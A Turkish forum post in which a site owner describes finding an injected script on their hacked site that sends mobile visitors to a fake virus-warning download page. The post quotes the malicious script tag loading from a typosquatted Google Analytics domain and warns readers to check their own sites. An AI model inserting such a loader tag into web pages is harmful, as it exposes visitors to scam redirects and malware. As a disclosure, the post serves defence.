Selamlar.
Bu hack olaylarında benim kadar başı yanan çok azdır. Siteye giriş varken mobilde, kazancın düştüğünü gözlemliyordum. Hiç akıl edip de mobilden deneme fırsatı bulamamıştım. Bir gireyim dedim, o ne! Sitemde yönlendirme var ve siteye giren girdi görünüyor ama 1-2 saniye sonra reklam koduyla beraber "telefonunuzda virüs var şu programı indirin" gibi bir siteye yönlendi.
Bunu görünce temayı güncelledim. Ama temanın kendi ayarlar kısmı db'de kayıtlı olduğundan sadece kodlar değişiyordu, ver girişi değişmiyordu. Temayı istediğim kadar değişeyim o kısım silinmeyecekti. O kısım da bizim Google Analytics typo domainiyle alınan bir site ve ona ait kod.

Kaynağı görüntüleyerek bakıyorum, benzediği gibi o koddan hiç şüphelenmiyorum. Meğerse hackle eklenmiş bir kod.

Özetle: sitemize girenler tek kod eklememiş, başka yerlere de kod eklemiş. Bu kod da Google analytics gibi bir domain olunca onu bizim eklediğimizi düşünmüşüz. Ama öyle değilmiş.

Görünümü şu şekilde:


Kod ise şu:

<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>

O siteye girince pek de Google sitesi gibi durmuyor: http://google-analyctis.com/
Gerçek Google sitesi: http://google-analytics.com/

c'nin yeri farklı yapılarak sahte kodla milleti yani bizi keklemişler. Herkes sitesini kontrol etsin. Özellikle son hack olaylarından sonra.

Saygılar.